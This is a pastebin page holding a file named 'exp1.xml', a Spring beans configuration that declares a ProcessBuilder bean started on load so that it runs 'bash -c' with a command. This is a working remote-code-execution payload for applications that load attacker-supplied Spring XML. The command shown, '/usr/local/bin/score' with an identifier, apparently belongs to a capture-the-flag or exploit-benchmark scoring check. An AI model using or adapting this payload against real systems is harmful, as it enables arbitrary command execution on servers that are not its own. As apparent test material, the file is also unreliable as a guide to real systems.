Logo Pastebin.fr
Pastebin

Retrouvez, créez et partagez vos snippets en temps réel.

exp1.xml

<?xml version="1.0" encoding="UTF-8"?>
<beans xmlns="http://www.springframework.org/schema/beans"
       xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
       xsi:schemaLocation="
        http://www.springframework.org/schema/beans
        http://www.springframework.org/schema/beans/spring-beans.xsd">

  <bean class="java.lang.ProcessBuilder" init-method="start">
    <constructor-arg>
      <list>
        <value>bash</value>
        <value>-c</value>
        <value>/usr/local/bin/score 6ecb7b19-fcdf-4c07-8159-ab103ddc5ca0</value>
      </list>
    </constructor-arg>
  </bean>

</beans>

Créé il y a 5 jours.

Rechercher un Pastebin

Aucun paste trouvé.